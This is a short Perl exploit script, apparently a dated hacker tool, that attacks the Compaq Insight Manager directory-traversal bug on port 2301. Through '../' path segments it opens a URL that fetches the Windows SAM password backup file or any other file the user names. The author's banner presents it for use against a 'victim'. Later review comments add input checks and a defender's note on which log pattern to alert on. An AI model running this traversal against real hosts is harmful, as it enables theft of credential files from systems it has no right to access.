#!/usr/bin/perl

# CIMcheck - Compaq Insight Manager Exploit Checker By Neon-Lenz
# --------------------------------------------------------------
# Yea i know this little script is very easy to code and lame, but
# what the hell. This should do the job. Assuming i'm still learning Perl..
# Still i'll try to do my best, and code a better script next time!
# Greets to: Acid Blades, B-r00t, KGB, ThePike and Trib.
# -Neon-Lenz. - neonlenz@nightmail.com

# Usage for Newbies: "perl CIMcheck.pl www.victim.com"
# With only a host given, the script checks the /winnt/repair/ directory
# and looks for the sam._ file.

#The COOL option (for experienced users)
# is like this: "perl CIMcheck.pl www.victim.com /directory_you_want/ fileyou.want"
# If you still don't get it, then that means you're a stupid dumb mother*ucker!!
# Umm pardon me...*ahum* :)

# Clear the console before showing the banner. 'cls' (and 'pause' below)
# are Windows console commands, so this script only behaves as intended
# when run from a Windows command prompt.
system('cls');

# Banner and usage text, emitted in one piece. The heredoc is
# non-interpolating, so the '@' in the contact address needs no escaping.
# NOTE(review): the two-argument example in this text
# ("www.victim.com /winnt/win.ini") does not match the argument handling
# further down, which takes the directory and the file name as two
# separate arguments.
print <<'END_BANNER';
CIMcheck - Compaq Insight Manager Exploit Checker By Neon-Lenz
--------------------------------------------------------------
CIMcheck checks for the (in)famous Compaq Insight Manager
root dot dot bug. To check this the remote webserver must be
running NT and having the port 2301 open.
This little exploit-script opens up the full vulnerable url
and attempts to get the sam._ backup password file from the remote
repair directory. Another cool option is that you can specify which
file you want to download, default is the /winnt/repair/ directory and
the sam._ backup password file. But if you assign the script like
this: perl CIMcheck.pl www.victim.com /winnt/win.ini
then it will attempt to get the win.ini file from the winnt directory
So in other words specify the directory and filename like this:
/directory/filename to attempt to download the remote file

Usage: perl CIMcheck.pl www.victim.com

For COOL option: perl CIMcheck.pl www.victim.com /dir_you_want/ fileyou.want

For more info e-mail me at neonlenz@nightmail.com
END_BANNER

# Wait for a key press so the banner can be read before the browser opens.
system('pause');

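# Target host, directory and file name come from the command line; each
# falls back to the author's default when the argument is missing or empty.
my $host      = $ARGV[0] || "www.victim.com";
my $directory = $ARGV[1] || "/winnt/repair/";
my $file      = $ARGV[2] || "sam._";

# The three values are interpolated into an argument handed to an external
# program. Accept only plain host and path characters so that quotes,
# spaces or command-interpreter metacharacters in an argument cannot change
# what is launched.
die "CIMcheck: host must contain only letters, digits, dots and hyphens\n"
    unless $host =~ m{\A [A-Za-z0-9] [A-Za-z0-9.-]* \z}x;
die "CIMcheck: directory must start with '/' and contain only plain path characters\n"
    unless $directory =~ m{\A / [A-Za-z0-9._~/-]* \z}x;
die "CIMcheck: file name must contain only letters, digits, '.', '_', '~' and '-'\n"
    unless $file =~ m{\A [A-Za-z0-9._~-]+ \z}x;

# The request is made by handing a URL on port 2301 to explorer.exe; the
# script never reads the response, so it produces no verdict of its own.
# NOTE(review): whatever handles the URL may normalise the dot segments
# before sending, so an unremarkable result here does not show that the
# host is unaffected. Confirm against the installed agent version.
# For defenders: the request as written is an HTTP GET to port 2301 whose
# path starts with "../" sequences. That pattern in agent, proxy or IDS
# logs is the thing to alert on. Keeping port 2301 unreachable from
# untrusted networks limits exposure regardless of patch state.
my $status = system("explorer.exe", "http://$host:2301/../../..$directory$file");

# -1 means the program could not be started at all. The exit code of
# explorer.exe is not checked because nothing here shows it reflects the
# outcome of the request.
warn "CIMcheck: explorer.exe could not be started: $!\n" if $status == -1;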

#Yea, no more code, so stop reading it you jerk! ;D